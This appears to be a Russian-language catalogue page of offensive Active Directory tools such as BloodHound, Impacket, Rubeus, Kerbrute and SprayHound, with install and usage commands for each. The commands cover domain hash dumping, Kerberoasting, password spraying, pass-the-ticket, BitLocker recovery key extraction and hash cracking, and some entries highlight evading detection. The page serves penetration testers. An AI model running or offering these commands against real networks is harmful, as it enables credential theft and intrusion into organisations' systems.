Каталог инструментов

11 инструментов

Тег: active-directory ×

BloodHound

v9.3.0
Reconnaissance ★ featured

Инструмент для визуализации и анализа путей атаки в Active Directory. Использует теорию графов для нахождения кратчайших маршрутов к Domain Admin. Собирает данные об объектах AD (SharpHound/BloodHound.py ingestor) и …

# BloodHound Community Edition (Docker) curl -L https://ghst.ly/getbhce | docker compose -f - up # Ingestor (сбор данных из домена) pip install bloodhound bloodhound-python -u user -p pass -d domain.local -c All # Классическая версия (Electron) # Скачать: https://github.com/BloodHoundAD/BloodHound/releases
Блог
Post-Exploitation

Python-скрипт для автоматического извлечения BitLocker Recovery Keys из Active Directory через LDAP. Обходит все компьютеры домена, получает ключи восстановления из атрибутов LDAP, поддерживает пагинацию для крупных доменов. Экспорт …

git clone https://github.com/p0dalirius/ExtractBitlockerKeys cd ExtractBitlockerKeys pip install -r requirements.txt # Извлечь ключи со всех компьютеров домена python ExtractBitlockerKeys.py \ -d 'domain.local' \ -u 'Administrator' \ -p 'Password123!' \ --dc-ip 192.168.1.101 # Экспорт в XLSX + JSON python ExtractBitlockerKeys.py \ -d domain.local -u admin -p Pass --dc-ip 192.168.1.101 \ --export-xlsx keys.xlsx \ --export-json keys.json \ --export-sqlite3 keys.db # Использовать LDAPS python ExtractBitlockerKeys.py -d domain.local -u admin -p Pass --use-ldaps

Impacket

vimpacket_0_13_1
Exploitation ★ featured

Python-библиотека и набор утилит для работы с сетевыми протоколами Windows: SMB, LDAP, Kerberos, MSRPC, MSSQL. Содержит готовые скрипты для атак: • secretsdump.py — дамп хешей через DCSync или …

# pip (рекомендуется) pip install impacket # Из исходников git clone https://github.com/fortra/impacket cd impacket && pip install . # Kali Linux apt install python3-impacket impacket-scripts # Пример: дамп хешей домена secretsdump.py domain/user:pass@dc-ip

Kerbrute

v1.0.3
Password Attacks

Быстрый инструмент для энумерации пользователей и брутфорса паролей через протокол Kerberos. Работает без создания event-логов на уровне NTLM, что делает его менее заметным для стандартных SIEM-систем. Режимы: • …

# Готовые бинарники # https://github.com/ropnop/kerbrute/releases # Go install go install github.com/ropnop/kerbrute@latest # Из исходников git clone https://github.com/ropnop/kerbrute cd kerbrute && make all

NetExec

v1.5.1
Exploitation

Швейцарский нож для аудита и эксплуатации сетей Windows/Active Directory. Форк и преемник CrackMapExec. Поддерживает протоколы: SMB, WinRM, LDAP, RDP, SSH, MSSQL, FTP. Основные возможности: • Проверка учётных данных …

# pip pip install netexec # Из исходников git clone https://github.com/Pennyw0rth/NetExec cd NetExec && pip install -e . # Pipx (изолированная установка) pipx install netexec

ROADrecon

Cloud & Container Security

Инструмент разведки и атак на Azure Active Directory (часть ROADtools). Собирает полную картину AAD: пользователи, группы, приложения, политики условного доступа, роли. Хранит данные в SQLite, отображает в браузерном …

pip install roadrecon roadrecon auth -u user@domain.com -p Password roadrecon gather roadrecon gui

Rubeus

v1.6.4
Post-Exploitation

C#-инструмент для атак на Kerberos в среде Active Directory: AS-REP Roasting, Kerberoasting, Pass-the-Ticket, Overpass-the-Hash, Golden/Silver Ticket, S4U delegation, PKINIT. Часть арсенала GhostPack.

# Сборка из исходников (Visual Studio / .NET): git clone https://github.com/GhostPack/Rubeus # Открыть Rubeus.sln, собрать Release x64 # Часто загружается через C2 в память: # execute-assembly Rubeus.exe kerberoast /outfile:hashes.txt # Команды: Rubeus.exe kerberoast # Kerberoasting Rubeus.exe asreproast # AS-REP Roasting Rubeus.exe dump # дамп тикетов Rubeus.exe ptt /ticket:... # Pass-the-Ticket

SharpHound

v2.13.0
Post-Exploitation

Коллектор данных для BloodHound: собирает информацию об Active Directory — пользователи, группы, компьютеры, сессии, ACL, GPO, trust relationships. Работает как C#-агент в домене. Вывод в формате JSON/ZIP для …

# Скачать с GitHub Releases: # https://github.com/BloodHoundAD/SharpHound/releases SharpHound.exe -c All SharpHound.exe -c DCOnly # быстрый режим, только DC SharpHound.exe -c All --stealth # скрытный режим # Через PowerShell: Import-Module ./SharpHound.ps1 Invoke-BloodHound -CollectionMethod All

SprayHound

v0.0.3
Password Attacks

Password spray для Active Directory с интеграцией BloodHound: проверяет политику блокировки и счётчик badPwdCount перед атакой, автоматически помечает найденные учётки как Owned в BloodHound.

# pip pip install sprayhound # Из исходников git clone https://github.com/Hackndo/sprayhound cd sprayhound && pip install -e . # Зависимости pip install ldap3 termcolor # Пример: spray ActiveDirectory sprayhound -U users.txt -p 'Password123' -d domain.local -dc 192.168.1.1

enum4linux-ng

v1.3.10
Reconnaissance

Современная переработка enum4linux на Python — инструмент для перечисления информации с хостов Windows и Samba через протоколы SMB, RPC и LDAP. Незаменим при разведке Active Directory и внутренних …

# pip: pip install enum4linux-ng # или из репозитория: git clone https://github.com/cddmp/enum4linux-ng cd enum4linux-ng pip install -r requirements.txt # Зависимости (для полного функционала): sudo apt install samba-common-bin ldap-utils # Примеры: # Базовое перечисление: enum4linux-ng 192.168.1.10 # С аутентификацией: enum4linux-ng -u administrator -p Password123 192.168.1.10 # Только пользователи и группы: enum4linux-ng -U -G 192.168.1.10 # LDAP + вывод в JSON: enum4linux-ng -oJ result.json -l 192.168.1.10
Post-Exploitation

Python-утилита для Kerberoast-атаки с дополнительным механизмом ACL abuse: для пользователей без SPN скрипт пытается временно выставить SPN (используя права на запись в атрибут `servicePrincipalName`), получает Kerberos hash, затем …

git clone https://github.com/p0dalirius/targetedKerberoast cd targetedKerberoast pip install -r requirements.txt # Атака по всем пользователям домена python targetedKerberoast.py \ -d domain.local \ -u user \ -p 'Password123!' \ --dc-ip 192.168.1.101 # Только конкретный пользователь python targetedKerberoast.py -d domain.local -u user -p Pass \ --request-user target_user --dc-ip 192.168.1.101 # Pass-the-hash python targetedKerberoast.py -d domain.local -u user \ -H 'LMHASH:NTHASH' --dc-ip 192.168.1.101 # Kerberos auth (ccache) export KRB5CCNAME=/tmp/user.ccache python targetedKerberoast.py -d domain.local -k --no-pass --dc-ip 192.168.1.101 # Сохранить хеши и взломать python targetedKerberoast.py -d domain.local -u user -p Pass -o hashes.txt hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt